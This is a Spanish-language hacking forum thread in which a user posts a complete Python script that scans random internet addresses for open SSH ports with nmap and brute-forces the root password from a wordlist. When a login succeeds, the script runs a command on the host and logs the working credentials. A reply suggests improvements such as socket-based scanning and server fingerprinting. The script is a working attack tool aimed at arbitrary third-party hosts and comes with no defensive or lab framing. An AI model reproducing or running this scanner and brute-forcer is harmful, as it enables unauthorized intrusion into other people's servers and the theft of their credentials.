comment
IRC Chat
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

SSH BruteForce

  • 1 Respuestas
  • 2022 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado @ed33x

  • *
  • Underc0der
  • Mensajes: 107
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
    • Email
« en: Enero 30, 2011, 10:13:43 am »
Código: Python
  1. #!/usr/bin/python
  2. #SSH BruteForcer that scans for random
  3. #open ssh ports using nmap and then brute
  4. #forces them.
  5.  
  6. #http://www.darkc0de.com
  7. #d3hydr8[at]gmail[dot]com
  8.  
  9. import sys, time, StringIO, commands, re
  10.  
  11. #Set the successful login file.
  12. save_file = "SSH_Logins.txt"
  13. #Set verbose mode: 1=on 0=off
  14. verbose = 1
  15. #Set the user to use.
  16. user = "root"
  17.  
  18. try:
  19.         import pexpect, pxssh
  20. except(ImportError):
  21.         print "\nYou need the pexpect module."
  22.         print "http://www.noah.org/wiki/Pexpect\n"
  23.         sys.exit(1)
  24.        
  25. def scan():
  26.         args = 'nmap -iR 1 -p 22 -open | grep open -B 3'
  27.         nmap = StringIO.StringIO(commands.getstatusoutput(args)[1]).read()
  28.         ipaddr = re.findall("\d*\.\d*\.\d*\.\d*", nmap)
  29.         if ipaddr:
  30.                 return ipaddr[0]
  31.  
  32. def brute(ip, word):
  33.         if verbose != 0:
  34.                 print "Trying:",word
  35.         try:
  36.                 s = pxssh.pxssh()
  37.                 s.login (ip, user, word, login_timeout=10)
  38.                 s.sendline (command)
  39.                 s.prompt()
  40.                 print "\n",s.before
  41.                 s.logout()
  42.                 print "\t[!] Login Success:",user, word,"\n"
  43.                 logins.writelines("SSH Login:"+ip+":22 "+user+" "+word+"\n")
  44.         except Exception, e:
  45.                 #print "[-] Failed"
  46.                 pass
  47.         except KeyboardInterrupt:
  48.                 print "\n[-] Quit\n"
  49.                 logins.close()
  50.                 sys.exit(1)
  51.  
  52. print "\n\t   d3hydr8:darkc0de.com sshBrute/Random v1.0"
  53. print "\t----------------------------------------------"
  54.        
  55. if len(sys.argv) != 3:
  56.         print "\nUsage : ./sshbrute_random.py <how many> <wordlist>"
  57.         print "Eg: ./sshbrute_random.py 1000 words.txt\n"
  58.         sys.exit(1)
  59.  
  60. num = sys.argv[1]
  61. command = 'uname -a'
  62. logins = open(save_file, "a")
  63.  
  64. try:
  65.         words = open(sys.argv[2], "r").readlines()
  66. except(IOError):
  67.         print "\n[-] Error: Check your wordlist path\n"
  68.         sys.exit(1)
  69.  
  70. print "\n[+] Loaded:",len(words),"words"
  71. print "[+] User:",user
  72. print "[+] Save file:",save_file
  73. if verbose != 0:
  74.         print "[+] Verbose Mode: On"
  75. else:
  76.         print "[+] Verbose Mode: Off"
  77. print "[+] Scanning:",num,"ips\n"
  78.  
  79. for x in xrange(int(num)):
  80.         print "[-] Scanning:",x+1,"of",num
  81.         ip = scan()
  82.         if ip != None:
  83.                 print "\n\t[+] BruteForcing:",ip,"\n"
  84.                 for word in words:
  85.                         #Change this time if needed
  86.                         time.sleep(0.5)
  87.                         brute(ip, word.replace("\n",""))
  88. logins.close()
  89. print "\n[-] Done\n"
  90.  
« Última modificación: Enero 18, 2013, 05:39:36 pm por 11Sep »
Me cambie de messenger ahora es: edeex@live.comYou are not allowed to view links. Register or Login

Desconectado ksha

  • *
  • Underc0der
  • Mensajes: 46
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« Respuesta #1 en: Febrero 08, 2011, 11:42:00 am »
2 recomendaciones:

1. por que utiliza nmap si puedes conectar un socket a ese puerto y si no tiene el 22 abierto podria ser otro puerto.

puedes utilizar un db como la q tiene nmap para realizar finger printing del ssh.

2.- si es un buen server probablemente te baneen al 3 intento o al primero o quizas ni siquiera te deje logearte ya que utilizan llave publica.
You are not allowed to view links. Register or Login

 

¿Te gustó el post? COMPARTILO!



Python phpmyadmin "BruteForce"

Iniciado por linkgl

Respuestas: 2
Vistas: 2316
Último mensaje Agosto 19, 2011, 12:14:37 pm
por linkgl
Local Root Bruteforce por Wordlist

Iniciado por @ed33x

Respuestas: 0
Vistas: 1159
Último mensaje Enero 30, 2011, 10:09:36 am
por @ed33x
Local Root Bruteforce por Wordlist

Iniciado por ProcessKill

Respuestas: 0
Vistas: 1282
Último mensaje Febrero 24, 2010, 04:10:42 pm
por ProcessKill
PoC incrementString [base para bruteforce]

Iniciado por blozzter

Respuestas: 0
Vistas: 1072
Último mensaje Octubre 24, 2011, 09:32:58 pm
por blozzter
Bruteforce FTP Server

Iniciado por skollprog

Respuestas: 0
Vistas: 467
Último mensaje Diciembre 24, 2017, 02:53:57 pm
por skollprog